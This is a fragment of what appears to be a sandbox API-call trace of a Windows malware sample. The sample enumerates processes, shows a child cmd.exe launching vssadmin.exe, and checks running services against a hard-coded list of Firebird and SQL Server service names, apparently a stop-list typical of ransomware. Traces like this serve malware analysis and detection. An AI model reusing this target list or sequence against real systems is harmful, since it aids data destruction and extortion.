hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0053.497] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0053.497] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0053.498] lstrlenW (lpString="educated.exe") returned 12 [0053.498] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0053.498] lstrlenW (lpString="servers.exe") returned 11 [0053.498] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0053.499] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0053.499] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0053.500] lstrlenW (lpString="gbp_chair.exe") returned 13 [0053.500] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0053.500] lstrlenW (lpString="attention infected.exe") returned 22 [0053.500] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0053.501] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0053.501] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0053.502] lstrlenW (lpString="pattern amateur.exe") returned 19 [0053.502] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0053.502] lstrlenW (lpString="referral.exe") returned 12 [0053.502] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0053.503] lstrlenW (lpString="copyingseems.exe") returned 16 [0053.503] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0053.504] lstrlenW (lpString="spin generally.exe") returned 18 [0053.504] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0053.508] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0053.538] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0053.539] lstrlenW (lpString="transmit.exe") returned 12 [0053.539] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0053.539] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0053.539] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0053.540] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0053.540] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0053.541] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0053.541] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0053.541] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0053.541] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0053.542] lstrlenW (lpString="delight.exe") returned 11 [0053.542] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0053.543] lstrlenW (lpString="within enquiry.exe") returned 18 [0053.543] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.597] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.597] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0053.598] lstrlenW (lpString="agent1c.exe") returned 11 [0053.598] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.598] lstrlenW (lpString="cmd.exe") returned 7 [0053.598] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.599] lstrlenW (lpString="conhost.exe") returned 11 [0053.599] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0053.600] lstrlenW (lpString="vssadmin.exe") returned 12 [0053.600] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0053.601] lstrlenW (lpString="VSSVC.exe") returned 9 [0053.601] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.601] lstrlenW (lpString="svchost.exe") returned 11 [0053.602] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.602] CloseHandle (hObject=0x1d8) returned 1 [0053.602] Sleep (dwMilliseconds=0x1f4) [0054.918] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3ed04f8 [0054.918] EnumServicesStatusExW (in: hSCManager=0x3ed04f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0054.918] GetLastError () returned 0xea [0054.918] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0054.919] EnumServicesStatusExW (in: hSCManager=0x3ed04f8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0054.919] CloseServiceHandle (hSCObject=0x3ed04f8) returned 1 [0054.920] lstrlenW (lpString="Appinfo") returned 7 [0054.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.920] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0054.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.920] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.920] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.920] lstrlenW (lpString="AudioSrv") returned 8 [0054.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0054.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0054.920] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0054.920] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0054.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0054.920] lstrlenW (lpString="BFE") returned 3 [0054.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.920] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.920] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.920] lstrlenW (lpString="CryptSvc") returned 8 [0054.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.920] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.920] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.921] lstrlenW (lpString="CscService") returned 10 [0054.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0054.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0054.921] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0054.921] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0054.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0054.921] lstrlenW (lpString="DcomLaunch") returned 10 [0054.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.921] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.921] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.921] lstrlenW (lpString="Dhcp") returned 4 [0054.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.921] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.921] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.921] lstrlenW (lpString="Dnscache") returned 8 [0054.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.921] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.921] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.921] lstrlenW (lpString="DPS") returned 3 [0054.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.921] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.921] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.921] lstrlenW (lpString="eventlog") returned 8 [0054.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0054.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0054.922] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0054.922] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0054.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0054.922] lstrlenW (lpString="EventSystem") returned 11 [0054.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.922] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.922] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.922] lstrlenW (lpString="gpsvc") returned 5 [0054.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.922] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.922] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.922] lstrlenW (lpString="iphlpsvc") returned 8 [0054.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.922] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.922] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.922] lstrlenW (lpString="LanmanServer") returned 12 [0054.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.922] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.922] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.922] lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.922] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.922] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.923] lstrlenW (lpString="lmhosts") returned 7 [0054.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.923] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.923] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.923] lstrlenW (lpString="MMCSS") returned 5 [0054.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0054.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0054.923] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0054.923] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0054.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0054.923] lstrlenW (lpString="MpsSvc") returned 6 [0054.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.923] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.923] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.923] lstrlenW (lpString="Netman") returned 6 [0054.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0054.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0054.923] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0054.923] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0054.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0054.923] lstrlenW (lpString="netprofm") returned 8 [0054.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.923] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.923] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.923] lstrlenW (lpString="NlaSvc") returned 6 [0054.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.924] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.924] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.924] lstrlenW (lpString="nsi") returned 3 [0054.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.924] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.924] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.924] lstrlenW (lpString="PcaSvc") returned 6 [0054.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.924] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.924] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.924] lstrlenW (lpString="PlugPlay") returned 8 [0054.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.924] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.924] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.924] lstrlenW (lpString="Power") returned 5 [0054.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.924] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.924] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.924] lstrlenW (lpString="ProfSvc") returned 7 [0054.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.924] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.925] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.925] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.925] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.925] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.925] lstrlenW (lpString="RpcSs") returned 5 [0054.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.925] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.925] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.925] lstrlenW (lpString="SamSs") returned 5 [0054.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.925] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.925] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.925] lstrlenW (lpString="Schedule") returned 8 [0054.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.925] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.925] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.925] lstrlenW (lpString="SENS") returned 4 [0054.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.925] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.925] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.925] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.926] 